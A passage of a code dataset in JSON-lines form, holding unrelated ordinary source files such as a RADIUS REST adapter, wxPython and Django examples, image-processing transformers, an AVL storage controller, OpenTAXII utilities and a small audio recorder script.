makeSign(self,message):\n secret = tools.safestr(self.config.adapters.rest.secret)\n emsg = tools.safestr(message)\n return md5( emsg + secret ).hexdigest()\n\n def send(self,req):\n url = self.config.adapters.rest.url\n msg = json.dumps(req.dict_message)\n sign = self.makeSign(msg)\n try:\n req = urllib2.Request('%s?sign=%s'%(url,sign),msg)\n resp = urllib2.urlopen(req)\n return json.loads(resp.read())\n except:\n self.logger.exception(\"send rest request error\")\n raise RestError(\"rest request error\")\n\n","sub_path":"toughradius/radiusd/adapters/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357385578","text":"questions = ['13+9=?',\r\n '25-4=?',\r\n '6+7=?',\r\n '18-5=?',\r\n '30+31=?',\r\n '71-10=?',\r\n '1+5=?',\r\n '9-3=?',\r\n '65-4=?',\r\n '15+6=?',\r\n '20-1=?',\r\n '29-10=?',\r\n '10+9=?',\r\n '69-8=?'\r\n ]\r\n \r\nanswers = ['21', '13', '6', '61', '19',\r\n 'twenty one', 'twenty-one',\r\n 'thirteen',\r\n 'six',\r\n 'sixty one', 'sixty-one',\r\n 'nineteen', 'nine-teen',\r\n '970x']\r\n\r\r\ndef keyword_search(keywords, lang='ch'):\r\n if lang.lower() == 'ch':\r\n return((set(Post.objects.filter(text__contains=keyword)) for keyword in keywords))\r\n elif lang.lower() == 'en':\r\n return((set(Post.objects.filter(text_eng__contains=keyword)) for keyword in keywords))\r\n \r\n","sub_path":"article/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"557013262","text":"# Chapter 7: Window Layout and Design\r\n# Recipe 4: Standard Dialog Button Sizer\r\n#\r\nimport wx\r\n\r\n#---- Recipe Code ----#\r\n\r\nclass CustomMessageBox(wx.Dialog):\r\n def __init__(self, parent, message, title=\"\",\r\n bmp=wx.NullBitmap, style=wx.OK):\r\n super(CustomMessageBox, self).__init__(parent, title=title)\r\n\r\n # Attributes\r\n self._flags = style\r\n self._bitmap = wx.StaticBitmap(self, bitmap=bmp)\r\n self._msg = wx.StaticText(self, label=message)\r\n\r\n # Layout\r\n self.__DoLayout()\r\n self.SetInitialSize()\r\n self.CenterOnParent()\r\n\r\n def __DoLayout(self):\r\n vsizer = wx.BoxSizer(wx.VERTICAL)\r\n hsizer = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n # Layout the bitmap and caption\r\n hsizer.AddSpacer(10)\r\n hsizer.Add(self._bitmap, 0, wx.ALIGN_CENTER_VERTICAL)\r\n hsizer.AddSpacer(8)\r\n hsizer.Add(self._msg, 0, wx.ALIGN_CENTER_VERTICAL)\r\n hsizer.AddSpacer(10)\r\n\r\n # Create the buttons specified by the style flags\r\n # and the StdDialogButtonSizer to manage them\r\n btnsizer = self.CreateButtonSizer(self._flags)\r\n\r\n # Finish the layout\r\n vsizer.AddSpacer(10)\r\n vsizer.Add(hsizer, 0, wx.ALIGN_CENTER_HORIZONTAL)\r\n vsizer.AddSpacer(8)\r\n vsizer.Add(btnsizer, 0, wx.EXPAND|wx.ALL, 5)\r\n\r\n self.SetSizer(vsizer)\r\n\r\n#---- End Recipe Code ----#\r\n\r\nclass ButtonSizerApp(wx.App):\r\n def OnInit(self):\r\n self.frame = ButtonSizerFrame(None,\r\n title=\"Button Sizer\")\r\n self.frame.Show()\r\n return True\r\n\r\nclass ButtonSizerFrame(wx.Frame):\r\n def __init__(self, parent, *args, **kwargs):\r\n wx.Frame.__init__(self, parent, *args, **kwargs)\r\n\r\n # Attributes\r\n self.panel = ButtonSizerPanel(self)\r\n\r\n # Layout\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.Add(self.panel, 1, wx.EXPAND)\r\n self.SetSizer(sizer)\r\n self.SetInitialSize()\r\n\r\nclass ButtonSizerPanel(wx.Panel):\r\n def __init__(self, parent, *args, **kwargs):\r\n wx.Panel.__init__(self, parent, *args, **kwargs)\r\n\r\n # Attributes\r\n self.button = wx.Button(self, label=\"Show Dialog\")\r\n\r\n # Layout\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.AddStretchSpacer()\r\n hsizer = wx.BoxSizer()\r\n hsizer.AddStretchSpacer()\r\n hsizer.Add(self.button, 0, wx.ALL, 20)\r\n hsizer.AddStretchSpacer()\r\n sizer.Add(hsizer, 0, wx.EXPAND)\r\n sizer.AddStretchSpacer()\r\n self.SetSizer(sizer)\r\n\r\n # Event Handlers\r\n self.Bind(wx.EVT_BUTTON, self.OnShowDlg, self.button)\r\n\r\n def OnShowDlg(self, event):\r\n \"\"\"Shows the dialog when our button is clicked\"\"\"\r\n msg = \"Look at how my buttons are in the right places!\"\r\n bmp = wx.Bitmap(\"./face-monkey.png\")\r\n dlg = CustomMessageBox(self, msg, \"Button Sizer\", bmp,\r\n style=wx.OK|wx.CANCEL)\r\n dlg.ShowModal()\r\n\r\nif __name__ == '__main__':\r\n app = ButtonSizerApp(False)\r\n app.MainLoop()\r\n","sub_path":"wxPython Test/wxPython 2.8 Application Development Cookbook Source Code/1780_07_Code/04/btnsizer.py","file_name":"btnsizer.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595225880","text":"import numpy as np\nfrom network import Network\n\n# training data with 2 input values and the 1 expected output value -> logical AND\nTRAINING_DATA_1 = np.array([\n (0, 0, 0),\n (0, 1, 0),\n (1, 0, 0),\n (1, 1, 1)\n])\n\nNUM_INPUTS_1 = 2\nNUM_OUTPUTS_1 = 1\n\n# training data with 8 inputs and the 3 expected output values -> binary encoding\nTRAINING_DATA_2 = np.array([\n (1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n (0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1),\n (0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0),\n (0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 1),\n (0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0),\n (0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1),\n (0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0),\n (0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1),\n])\n\nNUM_INPUTS_2 = 8\nNUM_OUTPUTS_2 = 3\n\nNUM_ITERATIONS = 1000\n\nif __name__ == \"__main__\":\n\n # network initialisation\n learning_rate = 0.1\n network = Network(NUM_INPUTS_2, learning_rate)\n # add a hidden layer with 4 units\n network.add_layer(4)\n # add an output layer\n network.add_layer(NUM_OUTPUTS_2)\n\n # print(\"created network:\\n%s\" % network)\n\n for i in range(NUM_ITERATIONS):\n\n print(\"iteration:\", i)\n\n for data in TRAINING_DATA_2:\n input = data[:NUM_INPUTS_2]\n label = np.array(data[NUM_INPUTS_2:])\n print(\"input: %s, label: %s\" % (input, label))\n\n network.forward_propagation(input)\n print(\"network output:\", network.outputs)\n\n network.back_propagation(label)\n network.update_weights()\n\n # print(\"updated network:\\n%s\" % network)\n\n print(\"\\n\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427540324","text":"#from django.core.urlresolvers import reverse\n\nfrom menu import Menu, MenuItem\n\ndef profile_title(request):\n \"\"\"\n Return a personalized title for our profile menu item\n \"\"\"\n # we don't need to check if the user is authenticated because our menu\n # item will have a check that does that for us\n name = request.user.get_full_name() or request.user\n return \"%s's Profile\" % name\n\n# Add two items to our main menu\nMenu.add_item(\"main\", MenuItem(\"Tools\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n icon=\"tools\"))\nMenu.add_item(\"main\", MenuItem(\"Reports\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=20,\n icon=\"report\"))\n# Define children for the my account menu\nmyaccount_children = (\n MenuItem(\"Edit Profile\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n icon=\"user\"),\n MenuItem(\"Admin\",\n reverse(\"admin:index\"),\n weight=80,\n separator=True,\n check=\n lambda\n request: request.user.is_superuser),\n MenuItem(\"Logout\",\n reverse(\"django.contrib.auth.views.logout_then_login\"),\n weight=90,\n separator=True,\n icon=\"user\"),\n )\n# Add a My Account item to our user menu\nMenu.add_item(\"user\", MenuItem(\"My Account\",\n reverse(\"django.contrib.auth.views.login\"),\n weight=10,\n children=myaccount_children))\n","sub_path":"paraiso/peluqueria/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"562738191","text":"from __future__ import (absolute_import, division, print_function)\n\nfrom collections import namedtuple\nfrom functools import partial\nfrom itertools import izip\n\nimport cv2\nimport numpy as np\nfrom sklearn.base import TransformerMixin, BaseEstimator\n\nfrom scpye.track.bounding_box import extract_bbox\n\nMaskedData = namedtuple('MaskedData', ['data', 'mask'])\n\n\ndef forward_list(func):\n \"\"\"\n Decorator that output a list if input is list\n Currently only handles class member function\n :param func:\n \"\"\"\n\n def func_wrapper(self, X, y=None):\n if y is None:\n if isinstance(X, list):\n return [func(self, each_X) for each_X in X]\n else:\n return func(self, X)\n else:\n if isinstance(X, list):\n # Make sure y corresponds to X\n if not isinstance(y, list):\n raise TypeError('y is not a list')\n if len(X) != len(y):\n raise ValueError('X and y not same length')\n\n Xts, yts = [], []\n for each_X, each_y in izip(X, y):\n if each_y is None:\n raise ValueError('y is None')\n Xt, yt = func(self, each_X, each_y)\n Xts.append(Xt)\n yts.append(yt)\n return Xts, yts\n else:\n return func(self, X, y)\n\n return func_wrapper\n\n\nclass ImageTransformer(BaseEstimator, TransformerMixin):\n func = None\n\n def fit_transform(self, X, y=None, **fit_params):\n # Because fit returns self, here fit does nothing\n if y is None:\n # fit method of arity 1 (unsupervised transformation)\n return self.fit(X, **fit_params).transform(X)\n else:\n # fit method of arity 2 (supervised transformation)\n return self.fit(X, y, **fit_params).transform(X, y)\n\n def fit(self, X, y=None, **fit_params):\n return self\n\n @forward_list\n def transform(self, X, y=None):\n \"\"\"\n transform function which dispatches work to other functions\n \"\"\"\n self._pre_transform(X, y)\n\n if y is None:\n return self._transform_X(X)\n else:\n return self._transform_Xy(X, y)\n\n def _pre_transform(self, X, y=None):\n \"\"\"\n Pre-transform some of the data so that it can be used later\n \"\"\"\n pass\n\n def _transform_X(self, X):\n \"\"\"\n Transform X to Xt\n \"\"\"\n Xt = self.func(X)\n return Xt\n\n def _transform_Xy(self, X, y=None):\n \"\"\"\n Transform X to Xt and y to yt\n \"\"\"\n Xt = self.func(X)\n yt = self.func(y)\n return Xt, yt\n\n\nclass ImageRotator(ImageTransformer):\n def __init__(self, ccw=-1):\n \"\"\"\n Rotate image n times counter-clockwise\n :param ccw: number of counter-clockwise rotations\n :type ccw: int\n \"\"\"\n self.ccw = ccw\n self.func = partial(np.rot90, k=self.ccw)\n\n\nclass ImageCropper(ImageTransformer):\n def __init__(self, bbox=None):\n \"\"\"\n Crop image to bounding box\n :param bbox:\n \"\"\"\n self.bbox = bbox\n self.func = partial(extract_bbox, bbox=self.bbox)\n\n\nclass ImageResizer(ImageTransformer):\n def __init__(self, k=0.5):\n \"\"\"\n Resize image by k\n :param k:\n \"\"\"\n self.k = k\n self.func = partial(cv2.resize, dsize=None, fx=self.k, fy=self.k,\n interpolation=cv2.INTER_NEAREST)\n\n\nclass ImageSmoother(ImageTransformer):\n def __init__(self, ksize=5, sigma=1):\n \"\"\"\n Smooth image with gaussian blur, only applied on image, not on label\n :param ksize: kernel size\n :param sigma: sigma\n \"\"\"\n self.ksize = ksize\n self.sigma = sigma\n self.func = partial(cv2.GaussianBlur, ksize=(self.ksize, self.ksize),\n sigmaX=self.sigma)\n\n # special case when y is not transformed (blurred)\n def _transform_Xy(self, X, y=None):\n Xt = self.func(X)\n yt = y\n return Xt, yt\n\n\ndef split_label(label):\n \"\"\"\n :param label:\n :return: split label\n :rtype: numpy.ndarray\n \"\"\"\n assert np.ndim(label) == 3 and np.size(label, axis=-1) == 2\n return label[:, :, 0] > 0, label[:, :, 1] > 0\n\n\nclass DarkRemover(ImageTransformer):\n def __init__(self, pmin=25):\n \"\"\"\n Remove dark pixels in image\n :param pmin: minimum value in gray scale image\n :type pmin: int\n \"\"\"\n assert 0 <= pmin < 255, \"pmin should be in [0, 255)\"\n self.v_min = pmin\n\n self.mask = None\n\n def _pre_transform(self, X, y=None):\n gray = cv2.cvtColor(X, cv2.COLOR_BGR2GRAY)\n self.mask = gray > self.v_min\n\n def _transform_X(self, X):\n return MaskedData(data=X, mask=self.mask)\n\n def _transform_Xy(self, X, y=None):\n neg, pos = split_label(y)\n neg_mask = self.mask & neg\n pos_mask = self.mask & pos\n\n y_neg = np.zeros(np.count_nonzero(neg_mask))\n y_pos = np.ones(np.count_nonzero(pos_mask))\n\n labels = np.dstack((neg_mask, pos_mask))\n yt = np.hstack((y_neg, y_pos))\n\n return MaskedData(data=X, mask=labels), yt\n","sub_path":"scpye/detect/image_transformer.py","file_name":"image_transformer.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281999712","text":"import re\nletters = {'к', 'п', 'т', 'с', 'ф', 'х', 'ц', 'ч', 'ш'}\nletters1 = set()\nwhile True:\n seq = input('Введите последовательность слов русского алфавита, разделяйте '\n 'запятой, в конце точка: ')\n seq = seq.lower()\n if re.search('[а-я]', seq):\n if re.search(',', seq):\n if seq.endswith('.'):\n seq = seq.replace('.', '')\n seq = seq.split(', ')\n seq = set(seq)\n seq1 = seq.copy()\n n = 0\n for i in seq1:\n n += 1\n if n % 2 == 0:\n seq.remove(i)\n else:\n pass\n for j in seq:\n for c in j:\n if c in letters:\n letters1.add(c)\n let = sorted(letters1)\n let1 = ' '.join(let)\n print(let1)\n\n else:\n print('postav tochku')\n else:\n print('postav komu')\n else:\n print('ruskimi pishi')\n ex = input('Для продолжения нажмите Enter...')\n if ex != '':\n break\n","sub_path":"laba 2/Б.py","file_name":"Б.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512615078","text":"# AVL Mode Package\n# Released under MIT License\n# Copyright (c) 2020 TytusDb Team\n# Developers: SG#16\n\n\nfrom ..DataAccessLayer import reports\nfrom .. import avlMode as AVLTreeStructure\nfrom ..DataAccessLayer.handler import Handler\n\n\nclass Controller:\n\n def __init__(self):\n self.structure = AVLTreeStructure\n\n def execute(self, args, action):\n try:\n actions = Enums.actions\n\n # region Database\n if action == actions[1]:\n return self.structure.createDatabase(args[0])\n elif action == actions[2]:\n tmp = self.structure.showDatabases()\n print(\"Databases:\")\n print(tmp)\n return tmp\n elif action == actions[3]:\n return self.structure.alterDatabase(args[0], args[1])\n elif action == actions[4]:\n return self.structure.dropDatabase(args[0])\n # endregion\n\n # region Tables\n elif action == actions[5]:\n return self.structure.createTable(args[0], args[1], int(args[2]))\n elif action == actions[6]:\n tmp = self.structure.showTables(args[0])\n print(\"Tables from \" + args[0] + \":\")\n print(tmp)\n return tmp\n elif action == actions[7]:\n tmp = self.structure.extractTable(args[0], args[1])\n print(\"Data from \" + args[0] + \"\\\\\" + args[1] + \":\")\n print(tmp)\n return tmp\n elif action == actions[8]:\n tmp = self.structure.extractRangeTable(args[0], args[1], int(args[2]), args[3], args[4])\n print(\"Data from \" + args[0] + \"\\\\\" + args[1] + \" with range \" + args[3] + \" - \" + args[4])\n print(tmp)\n return tmp\n elif action == actions[9]:\n return self.structure.alterAddPK(args[0], args[1], list(map(int, args[2].split(','))))\n elif action == actions[10]:\n return self.structure.alterDropPK(args[0], args[1])\n elif action == actions[13]:\n return self.structure.alterTable(args[0], args[1], args[2])\n elif action == actions[14]:\n return self.structure.alterAddColumn(args[0], args[1], args[2])\n elif action == actions[15]:\n return self.structure.alterDropColumn(args[0], args[1], int(args[2]))\n elif action == actions[16]:\n return self.structure.dropTable(args[0], args[1])\n # endregion\n\n # region Tuples\n elif action == actions[17]:\n return self.structure.insert(args[0], args[1], args[2].split(','))\n elif action == actions[18]:\n tmp = self.structure.loadCSV(args[0], args[1], args[2])\n print(\"csv:\")\n print(tmp)\n return tmp\n elif action == actions[19]:\n tmp = self.structure.extractRow(args[0], args[1], list(map(int, args[2].split(','))))\n print(\"Tuple from \" + args[0] + \"\\\\\" + args[1] + \":\")\n print(tmp)\n return tmp\n elif action == actions[20]:\n return self.structure.update(args[0], args[1], args[2], list(map(int, args[3].split(','))))\n elif action == actions[21]:\n return self.structure.delete(args[0], args[1], list(map(int, args[2].split(','))))\n elif action == actions[22]:\n return self.structure.truncate(args[0], args[1])\n elif action == actions[23]:\n self.structure.dropAll()\n # endregion\n else:\n return 6\n except:\n return 7\n\n @staticmethod\n def reportDB():\n return reports.graphicDatabases()\n\n @staticmethod\n def reportTBL(database: str):\n return reports.graphicTables(database)\n\n @staticmethod\n def reportAVL(database: str, table: str):\n return reports.graphAVL(database, table)\n\n @staticmethod\n def reportTPL(database: str, table: str, llave):\n return reports.graphTuple(database, table, llave)\n\n @staticmethod\n def getIndexes(database: str, table: str):\n avl_temp = Handler.tableinstance(database, table)\n return avl_temp.indexes()\n\n\nclass Enums:\n actions = {\n 1: \"Create database\",\n 2: \"Show databases\",\n 3: \"Alter database\",\n 4: \"Drop database\",\n 5: \"Create table\",\n 6: \"Show tables\",\n 7: \"Extract table\",\n 8: \"Extract range\",\n 9: \"Alter add PK\",\n 10: \"Alter drop PK\",\n 11: \"Alter add FK\",\n 12: \"Alter add index\",\n 13: \"Alter table\",\n 14: \"Add column\",\n 15: \"Drop column\",\n 16: \"Drop table\",\n 17: \"Insert\",\n 18: \"Load CSV\",\n 19: \"Extract row\",\n 20: \"Update\",\n 21: \"Delete\",\n 22: \"Truncate\",\n 23: \"Format DMS\"\n }\n","sub_path":"storage/fase2/team18/storage/avl/View/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"135633177","text":"# Copyright (c) 2015, Alphamonak Solutions Ltd.\n\n\nfrom __future__ import unicode_literals\n\nno_sitemap = 1\nno_cache = 1\nbase_template_path = \"templates/pages/desk.html\"\n\nimport os, re\nimport redapp\nfrom redapp import _\nimport redapp.sessions\n\ndef get_context(context):\n\tif (redapp.session.user == \"Guest\" or\n\t\tredapp.db.get_value(\"User\", redapp.session.user, \"user_type\")==\"Website User\"):\n\t\tredapp.throw(_(\"You are not permitted to access this page.\"), redapp.PermissionError)\n\n\thooks = redapp.get_hooks()\n\tboot = redapp.sessions.get()\n\n\t# this needs commit\n\tcsrf_token = redapp.sessions.get_csrf_token()\n\n\tredapp.db.commit()\n\n\tboot_json = redapp.as_json(boot)\n\n\t# remove script tags from boot\n\tboot_json = re.sub(\"\\[^<]*\\\", \"\", boot_json)\n\n\treturn {\n\t\t\"build_version\": get_build_version(),\n\t\t\"include_js\": hooks[\"app_include_js\"],\n\t\t\"include_css\": hooks[\"app_include_css\"],\n\t\t\"boot\": boot if context.get(\"for_mobile\") else boot_json,\n\t\t\"csrf_token\": csrf_token,\n\t\t\"background_image\": boot.user.background_image or boot.default_background_image,\n\t\t\"google_analytics_id\": redapp.conf.get(\"google_analytics_id\")\n\t}\n\n@redapp.whitelist()\ndef get_desk_assets(build_version):\n\t\"\"\"Get desk assets to be loaded for mobile app\"\"\"\n\tdata = get_context({\"for_mobile\": True})\n\tassets = [{\"type\": \"js\", \"data\": \"\"}, {\"type\": \"css\", \"data\": \"\"}]\n\n\tif build_version != data[\"build_version\"]:\n\t\t# new build, send assets\n\t\tfor path in data[\"include_js\"]:\n\t\t\twith open(os.path.join(redapp.local.sites_path, path) ,\"r\") as f:\n\t\t\t\tassets[0][\"data\"] = assets[0][\"data\"] + \"\\n\" + unicode(f.read(), \"utf-8\")\n\n\t\tfor path in data[\"include_css\"]:\n\t\t\twith open(os.path.join(redapp.local.sites_path, path) ,\"r\") as f:\n\t\t\t\tassets[1][\"data\"] = assets[1][\"data\"] + \"\\n\" + unicode(f.read(), \"utf-8\")\n\n\treturn {\n\t\t\"build_version\": data[\"build_version\"],\n\t\t\"boot\": data[\"boot\"],\n\t\t\"assets\": assets\n\t}\n\ndef get_build_version():\n\treturn str(os.path.getmtime(os.path.join(redapp.local.sites_path, \"assets\", \"js\",\n\t\t\t\"desk.min.js\")))\n","sub_path":"redapp/templates/pages/desk.py","file_name":"desk.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"283011114","text":"from ..base import API\n\n\nclass ReferAPI(API):\n\n def observables(self, payload):\n \"\"\"\n https://visibility.amp.cisco.com/iroh/iroh-enrich/index.html#!/Refer/post_iroh_iroh_enrich_refer_observables\n \"\"\"\n\n response = self._request.post(\n '/iroh/iroh-enrich/refer/observables',\n json=payload,\n )\n response.raise_for_status()\n return response.json()\n","sub_path":"threatresponse/api/enrich/refer.py","file_name":"refer.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"447918038","text":"import contextlib\nimport datetime\nimport unittest\n\nimport mock\nimport pytz\n\nfrom greenpithumb import camera_manager\n\n\nclass TestCameraManager(unittest.TestCase):\n\n def test_save_photo(self):\n folder_path = 'C:/Users/Jeet/'\n mock_local_clock = mock.Mock()\n mock_camera = mock.Mock()\n mock_local_clock.now.return_value = datetime.datetime(\n 2016, 7, 23, 10, 51, 9, 928000, tzinfo=pytz.utc)\n with contextlib.closing(\n camera_manager.CameraManager(folder_path, mock_local_clock,\n mock_camera)) as manager:\n manager.save_photo()\n mock_camera.capture.assert_called_once_with(\n 'C:/Users/Jeet/2016-07-23T10-51-09.928000+00-00.jpg')\n mock_camera.close.assert_called()\n","sub_path":"tests/test_camera_manager.py","file_name":"test_camera_manager.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"542535608","text":"from typing import Sequence, Iterable\n\nfrom progress_checkpoint.common import AsyncCheckpoint\n\n\nasync def with_progress_async(seq: Iterable, checkpoint: AsyncCheckpoint, size=None, status=None, div=1):\n await checkpoint(0, status or '')\n if size is None:\n if not isinstance(seq, Sequence):\n seq = list(seq)\n size = len(seq)\n\n for i, e in enumerate(seq):\n yield e\n\n if i % div == 0:\n await checkpoint(i / size, status)\n\n\nasync def dummy_checkpoint_async(progress, status=None):\n return\n","sub_path":"progress_checkpoint/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"328357129","text":"import sys\nimport logging\nimport structlog\nimport importlib\nimport base64\nimport binascii\n\nfrom six.moves import urllib\n\nfrom .exceptions import InvalidAuthHeader\n\nlog = structlog.getLogger(__name__)\n\n\ndef get_path_and_address(domain, address):\n parsed = urllib.parse.urlparse(address)\n\n if parsed.scheme:\n return None, address\n else:\n return address, domain + address\n\n\ndef import_class(module_class_name):\n module_name, _, class_name = module_class_name.rpartition('.')\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n\ndef initialize_api(api_config):\n class_name = api_config['class']\n cls = import_class(class_name)\n params = api_config.get('parameters', None)\n\n if params:\n instance = cls(**params)\n else:\n instance = cls()\n\n log.info(\"api.initialized\", api=class_name)\n\n return instance\n\n\ndef parse_basic_auth_token(token):\n try:\n value = base64.b64decode(token)\n except (TypeError, binascii.Error):\n raise InvalidAuthHeader(\"Can't decode Basic Auth header value\")\n\n try:\n value = value.decode('utf-8')\n username, password = value.split(':', 1)\n return (username, password)\n except ValueError:\n raise InvalidAuthHeader(\"Invalid Basic Auth header value\")\n\n\nclass PlainRenderer(object):\n\n def __call__(self, logger, name, event_dict):\n pairs = ', '.join(['%s=%s' % (k, v) for k, v in event_dict.items()])\n return (\n '{timestamp} [{logger}] {level}: {event} {{{pairs}}}'\n .format(pairs=pairs, **event_dict))\n\n\ndef configure_logging(logging_levels, plain=False):\n\n _remove_all_existing_log_handlers()\n\n renderer = (\n PlainRenderer() if plain else\n structlog.processors.JSONRenderer())\n\n structlog.configure(\n processors=[\n structlog.stdlib.filter_by_level,\n structlog.stdlib.add_logger_name,\n structlog.stdlib.add_log_level,\n structlog.stdlib.PositionalArgumentsFormatter(),\n structlog.processors.TimeStamper(fmt='iso'),\n structlog.processors.StackInfoRenderer(),\n structlog.processors.format_exc_info,\n renderer\n ],\n context_class=dict,\n logger_factory=structlog.stdlib.LoggerFactory(),\n wrapper_class=structlog.stdlib.BoundLogger,\n cache_logger_on_first_use=True,\n )\n\n handler = logging.StreamHandler(sys.stdout)\n root_logger = logging.getLogger()\n root_logger.addHandler(handler)\n\n for logger, level in logging_levels.items():\n\n if logger.lower() == 'root':\n logger = ''\n\n logging.getLogger(logger).setLevel(level.upper())\n\n\ndef _remove_all_existing_log_handlers():\n for logger in logging.Logger.manager.loggerDict.values():\n if hasattr(logger, 'handlers'):\n del logger.handlers[:]\n\n root_logger = logging.getLogger()\n del root_logger.handlers[:]\n","sub_path":"opentaxii/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"596165743","text":"# -*- coding: utf-8 -*-\nfrom guillotina.addons import Addon\nfrom guillotina.interfaces import ILayers\nfrom guillotina import configure\n\nCMS_LAYER = 'guillotina_cms.interfaces.ICMSLayer'\n\n\n@configure.addon(\n name='cms',\n title='Guillotina CMS')\nclass CMSAddon(Addon):\n\n @classmethod\n async def install(cls, container, request):\n registry = request.container_settings\n registry.for_interface(ILayers)['active_layers'] |= {\n CMS_LAYER\n }\n registry._p_register()\n\n @classmethod\n def uninstall(cls, site, request):\n registry = request.container_settings\n registry.for_interface(ILayers)['active_layers'] -= {\n CMS_LAYER\n }\n registry._p_register()","sub_path":"guillotina_cms/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"130520407","text":"import sounddevice\nfrom scipy.io.wavfile import write\nfrom tkinter import *\nimport os\n\ndef recorder():\n#\tpath = \"/root/Music/\"\n\ttry:\n\t\tfs = 44100\n\t\tsecond = 10\n\n\t\tprint(\"recording start......\")\n\n\t\trecord_voice = sounddevice.rec(int(second * fs),samplerate=fs,channels=2)\n\t\tsounddevice.wait()\n\t\twrite(\"outss.wav\",fs,record_voice)\n\t#\tos.mkdir(path)\n\t#\tprint(\"path created\")\n\texcept Exception as e:\n\t\tprint(e)\n\n\n\nmain=Tk()\nmain.title(\"audio recorder\")\nmain.geometry(\"350x300\")\n\n\nbutton = Button(main,text=\"Start Recording\", font=(\"verdana,18\"),padx=14,pady=14,relief=\"ridge\",command=recorder)\nbutton.pack(side=TOP,pady=18)\n\nbutton1 = Button(main,text=\"Stop\", font=(\"verdana, 18\"),padx=18,pady=18,relief=\"ridge\",command=quit)\nbutton1.pack(side=TOP,pady=18)\nmain.mainloop()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"2776035","text":"from rest_framework import serializers\nfrom ..models.Tweet import Tweet\nfrom ElasticSearchPkg.TweetMappingModel import TweetMapping\n\nfrom emoji import UNICODE_EMOJI\n\n\ndef remove_emoji(src_str):\n return ''.join(c for c in src_str if c not in UNICODE_EMOJI)\n\n\nclass TweetSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Tweet\n fields = ('id', 'text', 'user_name', 'favorite_count', 'retweet_count',\n 'coordinates', 'geo', 'entities', 'source', 'place')\n\n def create(self, validated_data):\n # trim emoji\n user_name = remove_emoji(validated_data.pop('user_name'))\n text = remove_emoji(validated_data.pop('text'))\n\n tweet = Tweet.objects.create(**validated_data, text=text, user_name=user_name)\n\n # Create a log document\n mix = TweetMapping(\n id=tweet.id,\n user_name=tweet.user_name,\n text=tweet.text,\n favorite_count=tweet.favorite_count,\n retweet_count=tweet.retweet_count,\n coordinates=tweet.coordinates,\n geo=tweet.geo,\n place=tweet.place,\n source=tweet.source,\n created_at=tweet.created_at,\n updated_at=tweet.updated_at\n )\n mix.meta.id = tweet.id\n mix.save()\n\n return tweet\n","sub_path":"DisasterAPI/serializers/TweetSerializer.py","file_name":"TweetSerializer.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370355850","text":"from django.shortcuts import get_object_or_404, render\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import (\n ListView, DetailView,\n CreateView, UpdateView, DeleteView\n)\n\n\nfrom . import models\n\n\ndef song_list(request):\n songs = models.Song.objects.all()\n return render(request, 'song_list.html', {'songs': songs})\n\n\n#View for List of all Songs in Database\nclass SongListView(ListView):\n context_object_name = 'songs'\n model = models.Song\n\n# Create Views for full CRUD capabilities\n\n#View for Details of Song\nclass SongDetailView(DetailView):\n model = models.Song\n\n#View for Adding Song\nclass SongCreateView(CreateView):\n fields = ('title', 'artist', 'composition_date')\n model = models.Song\n\n#View for Updating Song Already in Database\nclass SongUpdateView(UpdateView):\n fields = ('title', 'artist', 'composition_date')\n model = 